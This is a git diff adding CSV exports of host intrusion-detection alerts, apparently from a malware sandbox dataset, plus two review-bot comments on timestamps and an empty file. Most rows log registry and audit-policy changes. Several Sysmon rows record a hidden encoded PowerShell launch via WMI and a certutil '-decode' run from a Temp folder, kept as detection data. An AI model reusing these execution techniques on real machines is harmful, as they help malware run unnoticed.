@@ -0,0 +1,183 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 23, 2020 @ 13:47:50.035",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '271f59daf9ca28fbeb0bd234897e1662' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +" +"May 23, 2020 @ 13:47:48.878",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '4cea2c835f70071dc02ed62b073dfba8' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '77e72a40def388a760e7dd5d34aee517e6c01817' +" +"May 23, 2020 @ 13:47:48.862",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'f09b8f706fbbdc831b56268167855de8' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '765494a3d04df5b143fa79ecd655484a9d80378a' +" +"May 23, 2020 @ 13:46:42.124",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '85a6f1b1286ecf20e01235e2d33ec25a' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'dc139d9e9ad39ee0dadd9b4f52db078581cfb394' +" +"May 23, 2020 @ 13:46:42.065",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '611308539b0b432c267cdad008c8d152' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '946019a260c9ac9732156f3dfde8ab1a02093bbd' +" +"May 23, 2020 @ 13:46:42.048",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : 'aa153037b39970a484b4832b0ffe8501' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '18145d2068766fb817f5dc40a5c023c4b7d7cb8d' +" +"May 23, 2020 @ 13:46:41.975",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '611308539b0b432c267cdad008c8d152' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '946019a260c9ac9732156f3dfde8ab1a02093bbd' +" +"May 23, 2020 @ 13:46:41.641",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '611308539b0b432c267cdad008c8d152' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '946019a260c9ac9732156f3dfde8ab1a02093bbd' +" +"May 23, 2020 @ 13:46:41.604",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-438079597-2123118846-2669748851' checksum changed. 
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '708111ebe998051bf46012611efd58c7' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '87407fbef078448a88fc7baf977bb2cc979eb369' +" +"May 23, 2020 @ 13:46:16.839",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 23, 2020 @ 13:46:09.098",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 23, 2020 @ 13:44:39.392",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM' checksum changed. +Old md5sum was: '85a6f1b1286ecf20e01235e2d33ec25a' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'dc139d9e9ad39ee0dadd9b4f52db078581cfb394' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.374",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains' checksum changed. +Old md5sum was: '611308539b0b432c267cdad008c8d152' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '946019a260c9ac9732156f3dfde8ab1a02093bbd' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.370",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin' checksum changed. +Old md5sum was: 'aa153037b39970a484b4832b0ffe8501' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '18145d2068766fb817f5dc40a5c023c4b7d7cb8d' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.359",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases' checksum changed. 
+Old md5sum was: '611308539b0b432c267cdad008c8d152' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '946019a260c9ac9732156f3dfde8ab1a02093bbd' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.333",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members' checksum changed. +Old md5sum was: '611308539b0b432c267cdad008c8d152' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '946019a260c9ac9732156f3dfde8ab1a02093bbd' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:44:39.312",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\SAM\Domains\Builtin\Aliases\Members\S-1-5-21-438079597-2123118846-2669748851' checksum changed. +Old md5sum was: '708111ebe998051bf46012611efd58c7' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '87407fbef078448a88fc7baf977bb2cc979eb369' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:39:30.424",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 23, 2020 @ 13:38:13.251",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:38:13.157",8,"Windows Audit Policy changed","""System audit policy was changed. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:38:05.891",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 23, 2020 @ 13:37:59.985",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +" +"May 23, 2020 @ 13:37:42.866",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:18:27.845 +ProcessGuid: {df9fc3d3-d123-5ec7-0000-00107aa91300} +ProcessId: 6856 +Image: C:\Windows\System32\certutil.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: CertUtil.exe +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: CertUtil.exe +CommandLine: ""C:\Windows\system32\certutil.exe"" -decode xtd42 y29x3 +CurrentDirectory: C:\Users\John Williams\AppData\Local\Temp\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=DE9C75F34F47B60A71BBA03760F0579E,SHA256=12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,IMPHASH=336674CB3C8337BDE2C22255345BFF43 +ParentProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300} +ParentProcessId: 6560 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: powershell -windowstyle hidden -en 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""","\""C:\\Windows\\system32\\certutil.exe\"" -decode xtd42 y29x3","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:27.894942900Z"",""eventRecordID"":""912"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:18:27.845\r\nProcessGuid: {df9fc3d3-d123-5ec7-0000-00107aa91300}\r\nProcessId: 6856\r\nImage: C:\\Windows\\System32\\certutil.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: CertUtil.exe\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CertUtil.exe\r\nCommandLine: \""C:\\Windows\\system32\\certutil.exe\"" -decode xtd42 y29x3\r\nCurrentDirectory: C:\\Users\\John Williams\\AppData\\Local\\Temp\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DE9C75F34F47B60A71BBA03760F0579E,SHA256=12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,IMPHASH=336674CB3C8337BDE2C22255345BFF43\r\nParentProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300}\r\nParentProcessId: 6560\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: powershell -windowstyle hidden -en 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\""""},""eventdata"":{""utcTime"":""2020-05-22 13:18:27.845"",""processGuid"":""{df9fc3d3-d123-5ec7-0000-00107aa91300}"",""processId"":""6856"",""image"":""C:\\\\Windows\\\\System32\\\\certutil.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""CertUtil.exe"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""CertUtil.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\certutil.exe\\\"" -decode xtd42 y29x3"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DE9C75F34F47B60A71BBA03760F0579E,SHA256=12F06D3B1601004DB3F7F1A07E7D3AF4CC838E890E0FF50C51E4A0C9366719ED,IMPHASH=336674CB3C8337BDE2C22255345BFF43"",""parentProcessGuid"":""{df9fc3d3-d121-5ec7-0000-0010716f1300}"",""parentProcessId"":""6560"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""powershell -windowstyle hidden -en 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""}}}" +"May 23, 2020 @ 13:37:40.225",15,"ATT&CK T1047: Wmiprvse Spawning Process","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:18:25.253 +ProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300} +ProcessId: 6560 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Windows PowerShell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: PowerShell.EXE +CommandLine: powershell -windowstyle hidden -en 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 
+CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 +ParentProcessGuid: {df9fc3d3-d0e3-5ec7-0000-00107c1d0700} +ParentProcessId: 5700 +ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe +ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding""","powershell -windowstyle hidden -en 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","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:25.263709300Z"",""eventRecordID"":""909"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:18:25.253\r\nProcessGuid: {df9fc3d3-d121-5ec7-0000-0010716f1300}\r\nProcessId: 6560\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: powershell -windowstyle hidden -en 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\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481\r\nParentProcessGuid: {df9fc3d3-d0e3-5ec7-0000-00107c1d0700}\r\nParentProcessId: 5700\r\nParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe\r\nParentCommandLine: C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding\""""},""eventdata"":{""utcTime"":""2020-05-22 13:18:25.253"",""processGuid"":""{df9fc3d3-d121-5ec7-0000-0010716f1300}"",""processId"":""6560"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Windows PowerShell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""PowerShell.EXE"",""commandLine"":""powershell -windowstyle hidden -en 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"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481"",""parentProcessGuid"":""{df9fc3d3-d0e3-5ec7-0000-00107c1d0700}"",""parentProcessId"":""5700"",""parentImage"":""C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding""}}}" diff --git a/data/MW_19_NIDS.csv b/data/MW_19_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_19_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_1_HIDS_1.csv b/data/MW_1_HIDS_1.csv new file mode 100644 index 0000000..40aeade --- /dev/null +++ b/data/MW_1_HIDS_1.csv 
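Review bot: The `timestamp` column in this export is the alert/indexing time, not the event time — the Sysmon rows near the end carry `UtcTime: 2020-05-22 13:18:27.845` and `systemTime: 2020-05-22T13:18:27.894942900Z` while their `timestamp` cell reads `May 23, 2020 @ 13:37:42.866`, roughly a day later, so any correlation of these HIDS rows with the NIDS capture or the sample's execution window keyed on `timestamp` will be skewed. A data dictionary (README or a header comment in the overview) should state which field is authoritative for ordering, e.g. `timestamp = SIEM ingestion time; event time is the UtcTime field embedded in data.win.system.message / full_log`. The column set also differs between per-sample exports (this file has six columns including `data.win.system.message` and `data.win.eventdata.commandLine`; the `MW_1_HIDS_1.csv` header that follows has four, with `full_log` in a different position), which is worth documenting so downstream parsers select columns by name rather than by index.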
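Review bot: `data/MW_19_NIDS.csv` contains only the header row `"@timestamp",message,"log.file.path"` with no data rows, and nothing in the commit records whether that means the sensor produced no alerts for this sample or the export failed. A one-line note in the dataset documentation distinguishing "no detections" from "no data collected" would prevent the empty file from being read as a negative result.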
@@ -0,0 +1,338 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 12:30:31.902",3,"Service startup type was changed", +"Apr 4, 2020 @ 12:29:21.055",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '73acbb9a6b37e06d3d01797d22daea0c' +New md5sum is : '0dc86d77d124bb6b155bb549028af3b4' +Old sha1sum was: '2c751e78055f27d77f2cd5500fea136989db0758' +New sha1sum is : 'c722c6e745e275c7f0d1d2539e58c03fd22195fa' +" +"Apr 4, 2020 @ 12:29:21.039",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '15a5122056556e452eb8a80f7bafc0ed' +New md5sum is : 'abdaf1142070594f55c16de20de0ecca' +Old sha1sum was: '6119a631079846a34ad70550b6245a827e56e943' +New sha1sum is : '7a54bab4683e307c96eebc64d5244ce6417b8b7c' +" +"Apr 4, 2020 @ 12:29:17.539",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a0e1' was added. +" +"Apr 4, 2020 @ 12:29:17.509",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:29:13.868",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 12:29:10.539",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : 'b4226e31c64aa3415f26064e055e68c3' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '46945000f0220428ef57f13d54c8a2ceaa305687' +" +"Apr 4, 2020 @ 12:29:10.508",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'b315409e33ad85f56aa7f98994a648f4' +New md5sum is : 'cf2fddc0383906c94bd746fc28f1c4d5' +Old sha1sum was: '264e0f23983367bd5365043fddede5f7f471ce68' +New sha1sum is : '2eaa7a7dac68d00dc822e249c351150d025f34a1' +" +"Apr 4, 2020 @ 12:29:10.492",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '2562a8b20783e33b22897206ebf502cf' +New md5sum is : 'd5462f300e2f617d362b4f3bb6d4ba99' +Old sha1sum was: 'ada72f790b4a65aa119002c7c3643cc502d4c463' +New sha1sum is : '00a49d93f252e8a492de34d56cc2b2ba1662a192' +" +"Apr 4, 2020 @ 12:29:09.680",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '3626264b2bd01507a49b19e1aa64e7ea' +New md5sum is : '25d0183d5c5629974b3c23282c14f09e' +Old sha1sum was: '3e044f3ca69dee62e15813eba0c19ae98d413fa2' +New sha1sum is : 'aeeefb5382709b3ffe72b88e68a1fc2869bdb3b8' +" +"Apr 4, 2020 @ 12:29:08.368",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'd0b31528150e0bcaaf1ca31e909625ae' +New md5sum is : 'f831bbb4b4e3aa71d36063136978431b' +Old sha1sum was: '4ac9c45fb8b59e455e5cffb095693fd8ba73e2e9' +New sha1sum is : 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +" +"Apr 4, 2020 @ 12:29:08.149",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'e6d41cd8615634f93c4cf78ea8862dc8' +New md5sum is : '07296bfe9f0bfcb49184a0b811972f99' +Old sha1sum was: '50d3eb76f8f9eeee924a8a583af5025746f5f498' +New sha1sum is : '79ebd2b7c3546c7dddfff35ea466cc526594382b' +" +"Apr 4, 2020 @ 12:29:07.492",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a0e1' was added. 
+" +"Apr 4, 2020 @ 12:29:07.477",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:29:07.368",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '5da37fb8bb1a89d035cf6d0905e889d3' +New md5sum is : 'e0538a3443440110bf3825bfec5e6075' +Old sha1sum was: 'b6d193698efd60175765020280fb2fc3e8647550' +New sha1sum is : 'e5f255d3aa180bfe02848c7ccd3f55a84325f55b' +" +"Apr 4, 2020 @ 12:29:07.180",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '52c5b7e643b603f7da07fb87724fd62b' +New md5sum is : '6021abc3342bd637a1f3e58eadc384a5' +Old sha1sum was: '00c98b4e3acc758733e97e05b2546ad10364a5e7' +New sha1sum is : '74fbcbb06a5825a47e0950f3cb6ac1c03e265d00' +" +"Apr 4, 2020 @ 12:29:06.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a0e1' was added. +" +"Apr 4, 2020 @ 12:29:06.646",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a0e1\Security' was added. +" +"Apr 4, 2020 @ 12:29:05.977",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd0b31528150e0bcaaf1ca31e909625ae' +New md5sum is : 'f831bbb4b4e3aa71d36063136978431b' +Old sha1sum was: '4ac9c45fb8b59e455e5cffb095693fd8ba73e2e9' +New sha1sum is : 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +" +"Apr 4, 2020 @ 12:29:04.133",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: '7d19d8f0e41d39b56e1a42b1146f6570' +New md5sum is : '1ff9d2bcd158e032084b85e368bbbc93' +Old sha1sum was: 'b0ae33cc6b87e9feb6cdb0b2cdbfbc0abd7c12e3' +New sha1sum is : '654be9998073db5fb7eb1b02ce093e6875191b0a' +" +"Apr 4, 2020 @ 12:28:58.586",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 4, 2020 @ 12:28:56.772",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '52fb5d0b7da48f73ac3fbe434dfe1f0a' +New md5sum is : '59c3dc20f6ca7bf5d3e4497b0fbb523a' +Old sha1sum was: 'de2f6be9dbec4b2bb8df4ca2490e582bcd21add6' +New sha1sum is : '21fd5eb9f4366c737be868e4d053798ae111f329' +" +"Apr 4, 2020 @ 12:28:56.351",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'b37d88849329a851787efa3b6513665f' +New md5sum is : 'd4e36f3a15fd44265b8465f9557ea88d' +Old sha1sum was: 'c9c09efe3bf177be5acc55723783810cf39fbd8a' +New sha1sum is : '452ac62117c54d53212a78a079263bb0875839f1' +" +"Apr 4, 2020 @ 12:28:56.273",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. 
+Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 4, 2020 @ 12:28:56.257",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '91ff903577114e23bb94c88a6e53fb30' +New md5sum is : 'b53bf2f3f61682c350be645945192116' +Old sha1sum was: 'e2bf40dac64a1e7b7e118a7c1d10223c8a45082b' +New sha1sum is : 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +" +"Apr 4, 2020 @ 12:28:51.820",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 